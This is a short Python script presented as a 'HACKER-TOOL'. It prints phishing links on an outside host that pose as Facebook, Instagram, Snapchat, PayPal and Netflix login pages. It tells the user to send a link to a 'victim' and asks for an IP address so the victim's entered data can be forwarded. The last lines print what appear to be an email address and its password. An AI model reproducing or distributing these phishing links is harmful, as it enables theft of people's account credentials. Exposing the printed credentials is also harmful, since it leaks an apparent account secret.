import os 
os.system ("clear")
print ("\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\")
print ("////////////////////////////////////////////////////////////////")
print ("|                                                              |")
print ("|	WELCOME TO HACKER-TOOL				       |")
print ("|					                       |")
print ("________________________________________________________________")
v7x = input ("Please understand that these actions are illegal and are at your risk. If you agree, write yes:")
print (v7x)
print ("1.Please note that this link only works if the victim is connected to the same network with you")
print ("2.Facebook hack link===>>http://ix-event.com.tr/log/FB/api.php?id=6172956916")
print ("3.Instagram hack link===>>http://ix-event.com.tr/log/IG?id=6172956916")
print ("4.Snapchat hack link===>>http://ix-event.com.tr/log/SN?id=6172956916")
print ("5.PayPal hack link===>>http://ix-event.com.tr/log/PY?id=6172956916")
print ("6.Netflix hack link===>>http://ix-event.com.tr/log/NT?id=6172956916")
print ("Choose one of the following links, then copy it and send it to the victim. Once registered, the process will be successful")
v7x2 = input ("Enter your IP address so that we can send the data entered by the victim to your device:")
print (v7x2)
print ("proothps@gmail.com")
print (" password==>protaud52836@$+")

